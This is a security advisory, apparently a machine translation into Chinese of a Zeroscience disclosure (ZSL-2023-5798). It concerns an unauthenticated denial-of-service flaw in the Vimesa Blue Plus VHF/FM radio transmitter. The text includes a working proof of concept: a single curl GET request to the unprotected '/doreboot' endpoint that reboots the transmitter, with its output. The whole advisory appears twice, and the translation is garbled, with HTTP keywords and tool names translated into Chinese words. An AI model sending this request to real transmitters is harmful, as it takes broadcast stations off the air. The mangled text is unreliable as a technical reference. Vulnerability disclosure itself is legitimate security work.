Vimesa VHF/FM发射器蓝色加上9.7.1(Doreboot)远程拒绝服务
Vendor: Video Medios,S.A。(Vimesa)
产品网页: https://www.vimesa.es
受影响的版本: IMG:V9.7.1 HTML:V2.4 RS485:V2.5
摘要:发射机蓝色Plus均设计了所有
最新技术,例如高效效率
最新一代LDMOS晶体管和高效率
电源。我们使用了现代界面和性能
在触摸屏上使用颜色显示,并带有简单的管理
软件和易于使用。发射器配备了
所有音频输入,包括完整音频的音频IP
界面。 VHF/FM发射器30-1000旨在
用于传播频繁的调制广播
在单声道或立体声中。它具有宽带特征
在VHF频繁范围为87.5-108 MHz,可以是
在此范围内以任何频率操作而无需对齐。
发射器输出功率在10%至110%之间变化
名义力量。它可以使用不同的遥控器
控制端口。它最多可以存储六个广播节目
包括程序特定参数,例如频率,
RF输出功率,模块类型,RD,AF级别和设计
限制。发射器配备了LAN接口
这允许完整的发射机遥控器
通过SNMP或Web服务器操作。
DESC:该设备患有拒绝服务(DOS)
脆弱性。未经验证的攻击者可以发出
未经授权的HTTP获取请求到未保护的端点
“ doreboot”并重新启动发射机操作。
在: LightTPD/1.4.32上测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5798
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5798.php
22.07.2023
- -
$ curl -v'http://192.168.3.11:5007/doreboot'
*尝试192.168.3.11:5007 .
*连接到192.168.3.11(192.168.3.11)端口5007(#0)
获取/Doreboot HTTP /1.1
HOST: 192.168.3.11:5007
用户代理:卷发/8.0.1
ACCEPT: /
* RECV失败:连接已重置
*关闭连接0
Curl:(56)RECV失败:连接已重置
Vendor: Video Medios,S.A。(Vimesa)
产品网页: https://www.vimesa.es
受影响的版本: IMG:V9.7.1 HTML:V2.4 RS485:V2.5
摘要:发射机蓝色Plus均设计了所有
最新技术,例如高效效率
最新一代LDMOS晶体管和高效率
电源。我们使用了现代界面和性能
在触摸屏上使用颜色显示,并带有简单的管理
软件和易于使用。发射器配备了
所有音频输入,包括完整音频的音频IP
界面。 VHF/FM发射器30-1000旨在
用于传播频繁的调制广播
在单声道或立体声中。它具有宽带特征
在VHF频繁范围为87.5-108 MHz,可以是
在此范围内以任何频率操作而无需对齐。
发射器输出功率在10%至110%之间变化
名义力量。它可以使用不同的遥控器
控制端口。它最多可以存储六个广播节目
包括程序特定参数,例如频率,
RF输出功率,模块类型,RD,AF级别和设计
限制。发射器配备了LAN接口
这允许完整的发射机遥控器
通过SNMP或Web服务器操作。
DESC:该设备患有拒绝服务(DOS)
脆弱性。未经验证的攻击者可以发出
未经授权的HTTP获取请求到未保护的端点
“ doreboot”并重新启动发射机操作。
在: LightTPD/1.4.32上测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5798
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5798.php
22.07.2023
- -
$ curl -v'http://192.168.3.11:5007/doreboot'
*尝试192.168.3.11:5007 .
*连接到192.168.3.11(192.168.3.11)端口5007(#0)
获取/Doreboot HTTP /1.1
HOST: 192.168.3.11:5007
用户代理:卷发/8.0.1
ACCEPT: /
* RECV失败:连接已重置
*关闭连接0
Curl:(56)RECV失败:连接已重置